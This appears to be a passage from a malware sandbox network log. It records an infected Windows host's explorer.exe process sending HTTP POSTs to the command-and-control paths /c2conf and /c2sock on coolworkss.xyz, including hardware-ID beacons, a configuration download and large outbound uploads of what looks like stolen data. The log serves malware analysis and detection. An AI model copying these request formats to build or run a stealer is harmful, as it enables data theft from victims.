Sep 5, 2023 13:03:10.612934113 CEST	2891	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:03:10.738908052 CEST	2892	OUT	Data Raw: b2 b3 a2 9c 29 8b 55 65 e5 57 17 eb 62 7f 67 5f 1e b2 9c eb 24 ad 5c c2 0a b3 ca 63 e5 29 7a c0 34 fe 97 96 67 cb ff 5a eb 87 89 be 4f 18 9f f0 3d 4b ff 27 cb 65 bd a4 ab b2 9f 44 9f 76 41 c5 3e ed 7c f0 11 8a be 87 fe b8 30 2f a0 ea 0c e4 8f e3 Data Ascii: )UeWbg_$\c)z4gZO=K'eDvA>\|0/!/x~$q`:fh8n{II_kdc_^o8bq'_=B'"om/c_kI}^~R,8vq!Y1=N@N
Sep 5, 2023 13:03:10.741369963 CEST	2895	OUT	Data Raw: 0f 26 ba 32 f5 fd 65 76 65 f1 25 6e 07 c8 4f ac 76 83 bc 84 cf ad 9c 0f d1 7f 09 83 53 16 c4 fb d6 76 79 e6 19 7f 1c a6 f5 5d 67 09 6e 45 fa 2b 61 7f da 1f 47 3e 25 fa 33 d9 46 7c 50 85 f9 c9 f7 17 3c f7 d9 ee bb 91 0f 70 d5 fe 3f 32 42 6e f3 b9 Data Ascii: &2eve%nOvSvy]gnE+aG>%3F\|P<p?2Bni_F[.129*cGF~mX1=SCv'1\|%CC':4\YF"em?CLyx6L+oX60@^a
Sep 5, 2023 13:03:10.741532087 CEST	2897	OUT	Data Raw: e4 67 7e d1 ed 7b d8 35 ee 8a cb ef 77 bf fd cc d9 01 ef 3b 28 b0 8d a1 dd 43 76 ef 5f 1d e2 1e f9 d9 7f b8 9f 6f ff 9d db f3 7b 8f 4e 59 c0 ff c4 76 fb e2 4d 5d ec 92 d9 16 32 4d e4 57 c8 b6 90 4f 21 a7 93 3a 48 f8 e7 1a 6c 8f 4d d3 e2 7a 8c 17 Data Ascii: g~{5w;(Cv_o{NYvM]2MWO!:HlMz/+d<sY\|PD}bZm+{:~%Mu,637>?tdx.@_-'4\cif81'}<AO6
Sep 5, 2023 13:03:10.741616964 CEST	2905	OUT	Data Raw: ff f1 1c d7 ff 44 c1 eb 3f 7a 4f 62 5e ff 13 e9 d7 7f a7 7f 59 ee fa 97 3f 64 7a e8 c3 ad cb 95 73 ea 6f 7e e7 a2 79 e9 b6 ca ff 2c a6 87 79 c5 6d 7b c1 dc 2e 06 8c 5a 56 59 ef fb cb cb ff ac 36 a3 f5 67 cd 81 aa e9 f4 f9 91 77 1c 7b e1 85 17 ba Data Ascii: D?zOb^Y?dzso~y,ym{.ZVY6gw{>-_<xysr1@I#ieV[ZkU^g\?{\|Ogog><8WY1]wcpby8v3?Z~^:s.}Ke\|xl?;
Sep 5, 2023 13:03:10.741657972 CEST	2910	OUT	Data Raw: 1e 6b 00 ad 73 82 e7 94 f9 1e fb 77 73 8c 0f e6 c7 56 fe cc 72 99 53 ea 3a d5 06 c6 6d 41 59 20 5c 03 3d d5 e4 7a de 51 58 f7 30 bc 2f d5 ad c9 f3 e9 09 39 4f 7e 6e 58 cf 09 9e 7f 56 9f 65 9a 76 01 c5 75 d2 79 30 58 4b 6f c5 f1 e0 ef 85 35 f9 f3 Data Ascii: kswsVrS:mAY \=zQX0/9O~nXVevuy0XKo5Jj&z&/va{y>ZChKr^x<oZ/VWcir'sWt\|)s^P9SaKZkOLzAe<y<n$_g-/G
Sep 5, 2023 13:03:10.741765976 CEST	2915	OUT	Data Raw: 53 06 58 37 ff e3 eb e9 68 e2 7f cc 00 7d fc 2f eb 1e 84 fc 2f 64 80 4d b0 bf 1e f0 bf 2c 2b ab ab 2b aa 0d ec 35 f7 b3 c6 ea 83 c8 1f 9a e0 7f d6 f6 4d f1 bf aa 0c b0 df e3 a2 ac b1 46 56 9a a6 c6 37 ba 7c 10 f8 5f e8 93 b3 d4 8e a1 ed bb be 9a Data Ascii: SX7h}//dM,++5MFV7\|_ZW eY,)Oy=lo]<X+^Eo__%x[ZE2akWN\8 scmY\|xky[7$J0DM?]
Sep 5, 2023 13:03:10.867651939 CEST	2918	OUT	Data Raw: d7 4f 65 17 a2 c1 d2 4f d1 f2 29 4b 62 fe a7 cb df 7d a4 68 9c ae 0a 58 cc e6 90 33 88 ee 49 d9 83 70 81 0e 0b e8 e8 05 b5 bc ac 27 d4 b9 03 8f 9d 3d 12 b3 0a e4 65 ba 5e 8f 4d 97 09 bf ab 9b ff 09 93 91 bc d5 a7 54 74 5a 2f 1e c9 57 d6 b4 3a c7 Data Ascii: OeO)Kb}hX3Ip'=e^MTtZ/W:PWL`Qs_0a.%LK,[l*Jr_s\nIJ/':ok(>RF:SGxiyn_4T/z^,<_3YY
Sep 5, 2023 13:03:10.869885921 CEST	2921	OUT	Data Raw: 7e ea f8 d4 3c 82 da c6 96 47 6d 6c aa 0d 4d b5 51 3c 2f b2 5c e6 51 2c a2 fb db 2f a8 43 b1 3d 17 05 d7 ce 44 77 db 90 6b 6b 6d 54 c6 bd a2 76 e6 be 7a 86 3b fb 2b 2e 3e 57 f2 fb b4 f3 ae 0a bf 6b 7b 91 f3 f7 ea 20 8d 96 5b af 47 8d 69 a2 d7 e9 Data Ascii: ~<GmlMQ</\Q,/C=DwkkmTvz;+.>Wk{ [Gi%v=hR7k}p4?][lA%W<R\|ek6;9)Uk{ooiqwW9m);(Rj2kV<soZ8e$
Sep 5, 2023 13:03:10.869887114 CEST	2923	OUT	Data Raw: 7a c8 3d 65 e3 86 80 c7 04 0c a7 00 4f 42 26 63 71 9a ac 7c aa 32 be 2c db 7d f9 44 97 ed b1 7c 41 c7 56 80 2d 27 8b 97 4f a4 da 9e 2b f2 d9 a0 f3 bf 3d 26 17 ba 23 8e fc 8e 5b b6 de f5 c5 0e 39 f4 eb 6e ef a5 eb fb ce ff f2 5a de f3 be 57 60 7b Data Ascii: z=eOB&cq\|2,}D\|AV-'O+=&#[9nZW`{\P&Rc2/-kZ#jNm'2w-V*<`oz\6DU4/K?knXm=q^_9h?
Sep 5, 2023 13:03:12.624473095 CEST	3631	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=4meofcau51uqip1gvn20m622s3; expires=Sat, 30 Dec 2023 04:49:51 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FvvODimDzdvqeFI5Z%2FpMklwrC5xTYjbkIECx%2FOc%2BgqDtYLEvwYEa%2FJ6TLNwOKUY3c92g8gQPvGnvmfBj5SJw5XLXBvU%2B862mqIOmhFOYwfTgZ4r4tkMCSN%2BggEi4EXpwRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfbf3b9b14958-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:03:12.624550104 CEST	3631	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49738	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:23.880969048 CEST	2760	OUT	POST /c2conf HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: coolworkss.xyz Content-Length: 36 Cache-Control: no-cache Data Raw: 6c 69 64 3d 69 4f 71 70 49 71 2d 2d 50 65 74 74 65 72 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: lid=iOqpIq--Petter&j=default&ver=4.0
Sep 5, 2023 13:02:24.302586079 CEST	2761	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=q8b2qbhfdelr729iqmf1kqcruv; expires=Sat, 30 Dec 2023 04:49:03 GMT; Max-Age=9999999; path=/ Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=keFWhFVjxJEVWnw5PdlzAzrx7jvtifTQL%2BGq6Prpumn5%2Fi5M9jtsRXMPz8LSgL81hcdKBEMGckyn5XYOWnb5XNfBIAVgc8ooNFBa50cbaXcRupxpQeHSGBzTabrAD%2BhDZg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfacfafa19ab4-MIA Data Raw: 33 66 35 30 0d 0a 50 5a 2f 49 5a 36 76 67 37 31 4e 43 49 32 75 2f 66 30 5a 77 48 54 39 4f 63 77 62 6b 75 76 6b 67 39 47 31 35 67 4e 45 73 59 2f 5a 47 6b 73 4a 48 69 38 44 50 63 54 51 42 55 5a 39 4c 61 6e 30 58 48 32 35 54 4a 73 62 4a 6e 41 4c 4f 54 51 33 79 70 45 6c 50 2b 7a 65 2f 36 45 65 4c 77 6f 34 33 59 42 6c 4c 32 52 34 71 41 33 67 54 51 33 6b 6d 78 4a 72 5a 41 70 45 56 57 37 72 78 64 32 37 38 48 62 2f 6f 52 34 76 41 6c 46 35 49 41 30 75 66 58 32 5a 51 50 52 39 73 46 6d 6a 47 67 4e 6b 43 6b 51 63 62 34 62 31 4f 41 70 31 53 37 36 51 45 77 34 79 49 4f 79 64 41 44 39 34 54 4b 78 56 34 57 69 38 5a 61 49 33 58 6b 55 33 57 51 58 53 4b 38 51 78 44 31 68 32 2f 36 45 65 4a 68 5a 56 78 65 41 4e 4a 38 68 6f 79 45 56 42 65 50 52 67 6b 36 62 44 5a 41 4e 52 4e 57 61 43 73 41 47 37 38 48 62 2f 6f 52 34 76 41 6c 46 35 49 41 30 75 66 58 32 5a 51 50 52 39 73 46 6d 6a 47 67 4e 6b 43 6d 67 59 62 36 62 6c 4b 41 5a 4e 53 2b 4b 6b 43 79 6f 2b 4b 4f 79 35 47 44 64 45 55 4b 52 52 2f 57 69 67 55 64 6f 50 52 6c 30 37 57 51 58 53 4b 38 51 78 44 31 68 32 2f 36 45 65 4a 68 5a 56 78 65 41 4e 4a 38 68 6f 79 45 56 42 65 50 52 67 6b 36 62 44 5a 41 4e 52 4e 57 61 43 73 41 47 37 38 48 62 2f 6f 52 34 76 41 6c 46 35 49 41 30 75 66 58 32 5a 51 50 52 39 73 46 6d 6a 47 67 4e 6b 43 6b 51 6f 54 36 62 56 47 41 59 5a 61 38 36 45 45 77 34 53 4d 50 43 78 48 43 64 77 64 49 68 35 2f 57 69 73 44 64 6f 50 65 69 Data Ascii: 3f50PZ/IZ6vg71NCI2u/f0ZwHT9Ocwbkuvkg9G15gNEsY/ZGksJHi8DPcTQBUZ9Lan0XH25TJsbJnALOTQ3ypElP+ze/6EeLwo43YBlL2R4qA3gTQ3kmxJrZApEVW7rxd278Hb/oR4vAlF5IA0ufX2ZQPR9sFmjGgNkCkQcb4b1OAp1S76QEw4yIOydAD94TKxV4Wi8ZaI3XkU3WQXSK8QxD1h2/6EeJhZVxeANJ8hoyEVBePRgk6bDZANRNWaCsAG78Hb/oR4vAlF5IA0ufX2ZQPR9sFmjGgNkCmgYb6blKAZNS+KkCyo+KOy5GDdEUKRR/WigUdoPRl07WQXSK8QxD1h2/6EeJhZVxeANJ8hoyEVBePRgk6bDZANRNWaCsAG78Hb/oR4vAlF5IA0ufX2ZQPR9sFmjGgNkCkQoT6bVGAYZa86EEw4SMPCxHCdwdIh5/WisDdoPei
Sep 5, 2023 13:02:24.302638054 CEST	2763	IN	Data Raw: 55 6a 57 51 58 53 4b 38 51 78 44 31 68 32 2f 36 45 65 4a 68 5a 56 78 65 41 4e 4a 36 77 30 7a 41 32 6b 66 47 52 4a 71 69 4e 2b 4e 41 76 6c 6e 57 61 44 78 44 45 50 57 51 4c 50 46 62 59 76 41 7a 33 4e 69 41 78 43 79 64 57 5a 51 50 52 39 75 55 79 62 Data Ascii: UjWQXSK8QxD1h2/6EeJhZVxeANJ6w0zA2kfGRJqiN+NAvlnWaDxDEPWQLPFbYvAz3NiAxCydWZQPR9uUybEmJxO1ldZorhODZNX+64Nxo2EIyFNB88aJBtxUiAYaYHVkEibCxzj8wBu/B2/6EeLwM9zYEYRnUVmUklNIR1KjdSSAvlnWaDxDEPWQLPFbYvAz3NiAxCydWZQPR9uUybEmJxO1ldZordCCZ5Q9KAPxouNOSlICt0R
Sep 5, 2023 13:02:24.302670956 CEST	2764	IN	Data Raw: 6c 38 77 42 75 2f 42 32 2f 36 45 65 4c 77 4d 39 7a 59 45 59 52 6e 55 56 6d 55 6c 64 65 4e 67 73 6d 71 4e 4f 62 52 59 59 5a 41 4b 4c 63 4a 6b 50 57 48 62 2f 6f 52 39 62 4d 34 6c 6c 69 41 30 75 66 58 32 59 4c 45 44 56 75 55 79 62 45 6d 74 6b 41 31 Data Ascii: l8wBu/B2/6EeLwM9zYEYRnUVmUldeNgsmqNObRYYZAKLcJkPWHb/oR9bM4lliA0ufX2YLEDVuUybEmtkA1E8c7vMWQ9Rb9qAMyouJPCBIBtQVKRptXCYDYIPZlEiSBxftv0oTnx+zxW2LwM9zYgNLn10jCj8FblFEjc64UIRPdIrxDEPWHb+1S6bqz3NiA0ufBEt6PR9uUybEmtkCkQNbuvEOCJhe/KADwoeAMSVLDtEdJBF5Wy
Sep 5, 2023 13:02:24.302701950 CEST	2765	IN	Data Raw: 46 2f 6d 36 6d 71 68 77 4d 39 7a 59 67 4e 4c 77 6c 4e 4c 65 68 51 66 62 67 67 4c 37 70 72 5a 41 4e 52 4e 57 61 44 78 44 67 61 59 48 36 58 6f 52 64 75 49 68 44 45 6a 54 67 37 5a 46 69 67 58 65 6c 49 76 47 47 47 50 31 6f 6c 4c 6d 41 63 54 37 62 5a Data Ascii: F/m6mqhwM9zYgNLwlNLehQfbggL7prZANRNWaDxDgaYH6XoRduIhDEjTg7ZFigXelIvGGGP1olLmAcT7bZFAZlV8aoGicziWWIDS59fZlA9HSsJJN6a23CbAw3lvA5u/B2/6EeLwJJ/Tylin189fRcfblMmxJrZANYIF6LrDEGTW/2vC8yPiTwrUxvdGCUaeE8gG2+G1phJlg4X471LCNQRksJHi8DPc2IDS50aPFInH2w+Z5bO
Sep 5, 2023 13:02:24.302732944 CEST	2767	IN	Data Raw: 4a 32 73 39 78 4a 45 6f 42 30 52 67 73 46 33 35 56 4a 68 6c 72 69 63 71 61 54 5a 38 49 45 4f 2b 38 51 41 53 61 54 66 71 68 44 73 47 4c 67 7a 64 67 44 32 61 31 58 32 5a 51 50 52 39 75 55 79 62 47 33 34 4d 43 7a 6b 31 62 31 4c 42 41 43 6f 56 51 2f Data Ascii: J2s9xJEoB0RgsF35VJhlricqaTZ8IEO+8QASaTfqhDsGLgzdgD2a1X2ZQPR9uUybG34MCzk1b1LBACoVQ/qZFpurPc2IDS58Can0XNm5Tfemw2QDUTVmg8QxBk1O98keJjoMxL00F1hUlHnFaKRhsjsqaRp4OFe2ySgSRW/quA8bCw15IA0ufX2ZQPR9sFnzGgNkCuQgOw4kObvwdv+hHi8CSf08pYp9fPX0XH25TJsSa2QDWCB
Sep 5, 2023 13:02:24.302764893 CEST	2768	IN	Data Raw: 55 30 44 31 68 6f 75 48 48 5a 54 4a 77 4e 32 68 64 79 59 53 35 55 49 45 75 79 7a 53 51 53 61 57 50 79 68 41 63 4f 42 69 33 46 75 4c 6d 47 66 58 32 5a 51 50 52 39 75 55 79 53 42 77 4e 73 61 31 45 38 33 34 62 4e 44 47 39 51 77 6c 65 68 48 69 38 44 Data Ascii: U0D1houHHZTJwN2hdyYS5UIEuyzSQSaWPyhAcOBi3FuLmGfX2ZQPR9uUySBwNsa1E834bNDG9QwlehHi8DPcz8PZrVfZlA9H24IC+6a2QDUTVmg8Q4GmB+l6EXDg4k/MkoF3A82AHlcIhpogduVTZUDHem7Tw6YVv2vCYnM4lliA0ufX2ZQPR0rCSTemttrvC5bjdsMQ9Ydv+gah+3lc2IDS59fPX0XH25TJsSa2QDWCBei6wxB
Sep 5, 2023 13:02:24.302797079 CEST	2769	IN	Data Raw: 6e 45 33 56 55 49 42 35 6a 67 73 71 52 52 59 51 4f 47 75 6d 2b 51 67 47 5a 55 76 65 72 44 4d 53 4f 67 44 59 6e 54 67 79 64 55 30 74 36 50 52 39 75 55 79 62 45 6d 74 6b 43 6b 52 64 62 75 76 45 4f 49 4a 6c 55 38 66 46 66 69 65 33 6c 63 32 49 44 53 Data Ascii: nE3VUIB5jgsqRRYQOGum+QgGZUverDMSOgDYnTgydU0t6PR9uUybEmtkCkRdbuvEOIJlU8fFfie3lc2IDS59fO1wQNW5TJsSa2Vv5Z1mg8QxD1h2/6gLFwtVzYEED2BcpEXBePhBilNiWSIQFEOe+QwyXWfuhCduLjTIrAUeydWZQPR9uUybEmJxa1ldZopBZF55Y8bwOyIGbPDABZrVfZlA9H24OKumw2QDUTVmgqiFp1h2/6E
Sep 5, 2023 13:02:24.302828074 CEST	2770	IN	Data Raw: 6c 4d 6d 78 4a 72 5a 41 4e 52 50 48 4f 37 7a 46 6b 50 55 58 2f 6d 6d 42 73 36 4d 67 6a 77 76 52 67 4c 53 46 79 6f 41 63 46 67 6b 48 57 79 4c 79 70 46 49 68 41 59 53 37 37 31 47 45 35 63 66 73 38 56 74 69 38 44 50 63 32 49 44 53 35 39 64 49 77 6f Data Ascii: lMmxJrZANRPHO7zFkPUX/mmBs6MgjwvRgLSFyoAcFgkHWyLypFIhAYS771GE5cfs8Vti8DPc2IDS59dIwo/BW5RVozbl1SbAFuN2wxD1h2/6BqH7eVzYgNLn189fRcfblMmxJrZANYIF6LrDEGGTf2hBc6MnzAoTgPdGy8YfFQoH22A2ZZDlw8e4rpcDNQRksJHi8DPc2IDS50aPFInH2wmaI3pmFTWYHOg8QxD1h3ixW2LwM9z
Sep 5, 2023 13:02:24.302860022 CEST	2772	IN	Data Raw: 5a 41 4e 52 4e 57 61 44 78 44 45 47 43 48 36 58 6f 56 34 66 74 35 58 4e 69 41 30 75 66 58 32 5a 51 50 30 39 73 53 53 62 47 6e 35 68 51 68 41 6b 59 39 4c 41 4a 50 36 70 63 36 36 63 4b 77 6f 4f 7a 44 77 35 4d 43 4e 34 54 5a 69 4e 70 55 44 77 53 59 Data Ascii: ZANRNWaDxDEGCH6XoV4ft5XNiA0ufX2ZQP09sSSbGn5hQhAkY9LAJP6pc66cKwoOzDw5MCN4TZiNpUDwSYYHmpUyRGxzstU5B2jCV6EeLwM9zYgNJ0l18UEYdZFFbyLfzANRNWaDxDEPUR73yR4m3jj8uRh/MUAcEclInECTIt/MA1E1ZoPEMQ9RZvfJHmcziWWIDS59fZlA9HSgAJN6ayxDNWki14xxu/B2/6EeLwJJ/TylLn1
Sep 5, 2023 13:02:24.302895069 CEST	2773	IN	Data Raw: 6f 33 62 44 45 50 57 48 62 2f 6f 52 34 76 43 6d 33 46 34 41 31 75 54 63 6b 78 51 50 52 39 75 55 79 62 45 6d 74 74 51 31 6c 64 5a 6f 76 52 4e 45 34 5a 5a 2f 72 77 47 6a 72 79 7a 46 69 35 47 43 4d 73 4e 4d 78 31 42 59 7a 6b 53 61 6f 6a 66 6a 56 50 Data Ascii: o3bDEPWHb/oR4vCm3F4A1uTckxQPR9uUybEmttQ1ldZovRNE4ZZ/rwGjryzFi5GCMsNMx1BYzkSaojfjVPWQXSK8QxD1h2/6EeJjc1pYnhJlV0bXBA1blMmxJrZANRPA6LrDEGhXPOkAt+TwBYuRgjLDTMdPxNDeSbEmtkA1E1ZorUOWdYPs8Vti8DPc2IDS59dIAM/BW5BNt2NyBXGXXSK8QxD1h2/tUum6uZzYlhmtV9mUD0f
Sep 5, 2023 13:02:24.302927971 CEST	2775	IN	Data Raw: 46 57 2f 48 69 52 66 62 4d 34 6c 6c 69 41 30 75 66 58 32 5a 51 50 52 30 30 55 54 7a 45 6d 4c 68 51 68 41 45 51 34 37 42 59 43 70 6c 54 37 4f 63 30 33 34 57 4f 50 6d 41 50 5a 72 56 66 5a 6c 41 39 48 32 35 54 4a 73 62 65 32 78 72 55 58 31 57 4e 32 Data Ascii: FW/HiRfbM4lliA0ufX2ZQPR00UTzEmLhQhAEQ47BYCplT7Oc034WOPmAPZrVfZlA9H25TJsbe2xrUX1WN2wxD1h2/6EeLwokgYBlLjU9/RywKfEML7prZANRNWf39IWnWHb/oR4ub4lliA0ufX2ZQPR06UTzEitUt/k1ZoPEMQ9YdvbhFkcDNdjJRBNgNJx17ViIWdcHmpXOACBjtjXAAmVP5oQCJzOJZYgNLn19mUD0dI1E8xO

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49739	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:24.621959925 CEST	2779	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:24.622896910 CEST	2779	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:25.021404982 CEST	2780	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ufc9sm70saeifvcl59qrfg292c; expires=Sat, 30 Dec 2023 04:49:03 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x15%2FIHVenl8FkGDt19Vzzz5tQd3gysC1U%2FXCktdZuEPY8KRdVQGa6zFdgoEfhXeaJ1hYICdz8dqyPZm886G0qQqm9VZn5GTDsOYTYVgBN5%2FbmpN%2BtV3b3Gf2tVFH9fQ0UQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfad44839b3e0-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:25.021457911 CEST	2780	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49740	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:25.357520103 CEST	2781	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:25.359893084 CEST	2781	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:25.646537066 CEST	2782	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=kpp6ht3poelm5fld5k91d9q0nn; expires=Sat, 30 Dec 2023 04:49:04 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zjg%2BowPMdIlMgPso6ZMB4bYmeSh89jcyQ7cLxB%2BB%2Bm08aBJbghOONqlVknGcH1LESjwNVFc5unLiJ%2FCkiWO%2ByL1MDtxnTmOI4M3454UPnK5AwcrddS1%2FyStdJCUEWti%2FmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfad8eef425b9-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:25.646569014 CEST	2782	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49741	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:25.996526003 CEST	2783	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:25.998500109 CEST	2784	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:26.401204109 CEST	2785	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=mvp2jgq5vb035oopisit29t7g2; expires=Sat, 30 Dec 2023 04:49:05 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xOWEHqzRTz2uAirYTmoQsxG1%2BdRBCd6w9FdeXoL5TB1oOklyuJvZ0YuKicNTK5rITWxMxj7RTtYMowgOJ5RI%2B6ttRmFNUMCuszsfs%2FHvyCTdE%2F7JXUPIvaF%2FMEuUoaUk%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfadcdee6db2d-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:26.401240110 CEST	2785	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49742	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:26.752743959 CEST	2785	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
